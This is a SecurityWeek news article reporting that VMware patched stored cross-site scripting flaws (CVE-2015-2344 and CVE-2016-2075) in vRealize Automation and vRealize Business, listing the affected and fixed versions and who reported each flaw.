Connect with us

Hi, what are you looking for?

SecurityWeekSecurityWeek

Cloud Security

VMware Patches XSS Flaws in vRealize

VMware announced on Tuesday that it released patches for the Linux version of two vRealize products in order to address cross-site scripting (XSS) vulnerabilities.

VMware announced on Tuesday that it released patches for the Linux version of two vRealize products in order to address cross-site scripting (XSS) vulnerabilities.

According to an advisory published by the company, the 6.x version of VMware vRealize Automation, a cloud automation software for the delivery of IT services, is plagued by a stored XSS flaw (CVE-2015-2344) that can be exploited to compromise client workstations.

The issue, reported by Lukasz Plonka, has been patched with the release of VMware vRealize Automation 6.2.4. vRealize Automation 7.x for Linux and vRealize Automation 5.x for Windows are not affected, the company said.

Another stored XSS vulnerability (CVE-2016-2075) has been found by Alvaro Trigo Martin de Vidales of Deloitte Spain in vRealize Business, a product designed to automate the core financial processes needed to plan and optimize the cost and value of IT in an organization.

According to VMware, exploitation of this vulnerability can also lead to users’ client workstations getting compromised.

The flaw affects VMware vRealize Business Advanced and Enterprise 8.x for Linux and it has been addressed with the release of version 8.2.5. vRealize Business Advanced and Enterprise 6.x and 7.x for Linux are not affected.

This is the third security advisory published by VMware this year. In January, the company issued updates to resolve a guest privilege escalation vulnerability affecting ESXi, Fusion, Player, and Workstation, and, in February, the virtualization giant started releasing patches for a recently disclosed flaw in the glibc library.

VMware also reissued a patch for a serious vCenter vulnerability that allowed remote attackers to execute arbitrary code on affected systems. The company reissued the fix after learning that it had not properly patched the problem.

Advertisement. Scroll to continue reading.
Written By

Eduard Kovacs (@EduardKovacs) is a managing editor at SecurityWeek. He worked as a high school IT teacher for two years before starting a career in journalism as Softpedia’s security news reporter. Eduard holds a bachelor’s degree in industrial informatics and a master’s degree in computer techniques applied in electrical engineering.

Click to comment

Trending

Daily Briefing Newsletter

Subscribe to the SecurityWeek Email Briefing to stay informed on the latest threats, trends, and technology, along with insightful columns from industry experts.

Join the session as we discuss the challenges and best practices for cybersecurity leaders managing cloud identities.

Register

SecurityWeek’s Ransomware Resilience and Recovery Summit helps businesses to plan, prepare, and recover from a ransomware incident.

Register

Expert Insights

Related Content

Application Security

Cycode, a startup that provides solutions for protecting software source code, emerged from stealth mode on Tuesday with $4.6 million in seed funding.

CISO Conversations

SecurityWeek talks to Billy Spears, CISO at Teradata (a multi-cloud analytics provider), and Lea Kissner, CISO at cloud security firm Lacework.

Cloud Security

Cloud security researcher warns that stolen Microsoft signing key was more powerful and not limited to Outlook.com and Exchange Online.

CISO Strategy

Okta is blaming the recent hack of its support system on an employee who logged into a personal Google account on a company-managed laptop.

Application Security

Virtualization technology giant VMware on Tuesday shipped urgent updates to fix a trio of security problems in multiple software products, including a virtual machine...

Application Security

Fortinet on Monday issued an emergency patch to cover a severe vulnerability in its FortiOS SSL-VPN product, warning that hackers have already exploited the...

Application Security

A CSRF vulnerability in the source control management (SCM) service Kudu could be exploited to achieve remote code execution in multiple Azure services.

Cloud Security

Microsoft and Proofpoint are warning organizations that use cloud services about a recent consent phishing attack that abused Microsoft’s ‘verified publisher’ status.